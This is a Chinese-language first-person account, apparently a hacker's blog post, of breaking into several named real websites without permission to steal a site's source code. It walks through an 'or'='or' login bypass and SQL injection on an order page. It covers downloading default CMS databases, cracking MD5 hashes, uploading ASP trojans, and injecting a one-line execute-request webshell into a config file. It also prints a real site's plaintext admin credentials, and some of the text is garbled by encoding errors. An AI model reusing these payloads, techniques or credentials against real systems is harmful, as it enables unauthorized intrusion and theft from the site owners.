繞來繞去的入侵 -電腦資料

    事情原因，

繞來繞去的入侵

。

    我朋友對http://www.059466.com/里的模擬考試程序非常感興趣，要源碼。要源碼咱就……

    整體看

    首頁應該自己編寫的。點連接加’測試注入。發(fā)現(xiàn)過濾了，不過過濾了post和get。Cookie應該沒過濾。。我也沒嘗試。換種方法再說。

    先不管了，找下后臺�？催@個網(wǎng)站有點像企業(yè)站。就隨便加了個manage目錄。。沒想到還真有。界面也非常丑陋。http://www.059466.com/manage/Login.asp估計是自己寫的。

    ‘or’=’or’

    進去了

    看這菜單。寒心。這樣的管理功能能拿到webshell?郁悶。

    于是我犯了一個錯誤。以為這就是后臺。于是我就旁注去了。如果我認真想下前臺的功能，就不會這樣犯了。這是后話。

    旁注嘛，打開http://www.114best.com/ip/114?w=www.059466.com

    共檢測到 36 個網(wǎng)站與www.059466.com在同一IP服務器上

    找啊找啊。http://www.20030.cn/ 的站點。加admin跳后臺

    木目下載系統(tǒng)。百度一下。下載一份。查看默認數(shù)據(jù)庫。最后用admin admin登陸進去- -

    管理菜單還是弱弱的

    技術不行，拿不到后臺。沒考慮用一句話方式。。。

    換站繼續(xù)http://www.ylpa.net/ 這個也是 在版權處看到Powered By WRMPS v5.0.2 2006-2009 Wangren Inc. 下載一份。按照默認庫下載

    可是，本地打開傻眼。

    Wm_password 才十位。。啊們。。�？礃幼討�該是md5后取十位了 看下login.asp代碼 找到md5 模塊

    MD5=Left(LCase(WordToHex(b) & WordToHex(c)),10)

    果然。。。請教了bs大叔后，知道除了自己寫程序跑密碼就沒其他辦法，不過事后我想通過cookie欺騙不知道是否能行？哪位老大知道的說下~

    最終也是放棄了。雖然……

    繼續(xù)找站。http://www.huayi2008.com

    常規(guī)方法沒效果。隨便點連接，看到了友情連接。

    原來還有sc目錄。。。進去看下

    注冊登陸。后來發(fā)現(xiàn)其實不注冊也行，下面有 非會員直接進入 的連接

    還是科訊的產(chǎn)品。�；枇恕�。直接上傳asp木馬呢？？？事實告訴我我RP還是不錯的。

    上傳完畢�？墒堑刂纺亍�。。竟然沒回顯。。。暈。現(xiàn)在有個思路就是自己下載一份系統(tǒng)。然后觀看上傳文件的目錄以及文件名的規(guī)律。于是百度下 科汛在線輸出產(chǎn)品 找到

    http://www.kesion.com/twcs/v2008/ 還真的是科汛的產(chǎn)品。。。發(fā)現(xiàn)是收費的。。我XXX。郁悶

    不過訂單連接。。

    查看訂單，http://www.huayi2008.com/sc/showorder.asp?id=359 加’ 報錯。加and 1=1 正常。加and 1=2出錯。暈。注入點。。。

    用工具吧。密碼沒加密 很好。username:huayi2008com

    password:36399796 用這賬號登陸就是admin權限。

    訂單管理果然看到我們的上傳文件。

    http://www.huayi2008.com/sc/system/uploadimages/12.asp

    連接~兩分鐘后發(fā)現(xiàn)shell不見了，

電腦資料

《繞來繞去的入侵》(http://m.clearvueentertainment.com)。。。難道被管理員發(fā)現(xiàn)了？再上傳。。。再不見。。原來是殺軟。。這webshell還是免殺的。。太變態(tài)的殺毒軟件了吧。。。

    提權。？。失敗了。。。真的沒什么思路。SerV-u等第三方軟件都沒安裝。。就安裝安全軟件。C d e 都不可讀。那我們的最開始目標呢？難道不要那源碼了？

    繞啊繞啊繞回來

    郁悶 繼續(xù)看原來的站。http://www.059466.com/ 哦。前臺還有留言板。那manage下面為什么沒。難道還有真正的后臺不成？這是假的》？http://www.059466.com/Admin_Login.asp 暈。隨便看下真的還有。。。這個難辦了。沒賬號密碼…

    在留言板我看到一張圖片。一個細節(jié)，決定這次的成功。

    高貝留言？？？解釋是？高貝聲音留言？？ - -顯然不是。這應該是一個cms吧。百度下載。

    果然。。。找到默認數(shù)據(jù)庫。Database\GaoBeiSys_V1x.mdb

    訪問目標站。

    暈了。改數(shù)據(jù)庫了？這時我注意到Database\GaoBeiSys_V1x.mdb

    V1x.mdb 1.0的版本？那如果他用2.0呢 不就是Database\GaoBeiSys_V2x.mdb

    …果然。！

    用迅雷下載~啦啦啦啦啦啦。。。本地看密碼.跑md5。。耶。出來了、

    進后臺發(fā)現(xiàn)這系統(tǒng)夠強大。

    有數(shù)據(jù)庫備份~太好了。按照我們常規(guī)的思路就是上傳圖片馬，備份生成asp。好。不過又是一個難題。

    竟然是空白頁面。

    看來upload.asp被管理員刪除了。。。這下郁悶了。不過有數(shù)據(jù)庫備份我們可以通過插一句話來。通過查看高貝的源文件。我發(fā)現(xiàn)一個重要文件。\Include\Gaobei_Setup.asp

    和后臺的系統(tǒng)幾本設置一樣。就是保存在asp文件。這樣我們就有機可乘！

    <%

    Gaobei_Title= "高貝系統(tǒng) V 2.0"

    我們把高貝系統(tǒng) V 2.0替換成 “%><%execute request(“fuck”)<%gaobei_fuck=”這樣就完全閉合了。然后用一句話連接\Include\Gaobei_Setup.asp.成了�。ㄟ@步感謝小帥給我那個laker2最小馬。郁悶了很久！也鄙視他改主頁 =_=）…

    進入后我隨便看了下發(fā)現(xiàn)有個bbs/的目錄，看文件結構是phpwind.我們看下其數(shù)據(jù)庫

    Data/sql_config.php

    這時我突然想到一個問題。就是我們購買虛擬機的時候，ftp的賬號和mysql賬號密碼都是一致的！包括虛擬機的管理頁面…果然 登陸ftp成功

    有ftp..要啥有啥。。嘿嘿。。。

    好了好了。。。就是這樣了。總結下。

    1.  由于第一次找了一個錯誤的低功能的后臺讓我走錯了路，旁注失敗。服務器權限太死。誰有興趣提權的找我吖！

    2.  在旁注過程中看到了一個不算很新的密碼加密算法。Md5后取前十位，可以借鑒。畢竟現(xiàn)在md5破解弱智密碼很簡單。如果取前十位。那就難了。

    3.  http://www.huayi2008.com/Chinese/index.asp 看到友情連接，鏈接到sc/目錄。導致此站點的崩潰。

    4.  提權-失敗。服務器開啟3389端口

    5.  回到原點，認真看前臺，發(fā)現(xiàn)功能強大，假后臺功能弱小。

    6.  看cms的圖片分辨出是用哪個cms系統(tǒng)。（這點非常好用！因為你可以改cms的文字，但是有些管理員懶得改圖片，要ps掉 版權。以前也用過�。┤缓笸ㄟ^版本得到數(shù)據(jù)庫路徑。

    7.  在去掉上傳文件的情況下通過一句話得到webshell。最后打包下載。

    8.  最后通過查看phpwind的mysql配置文件，得到了ftp的賬號密碼。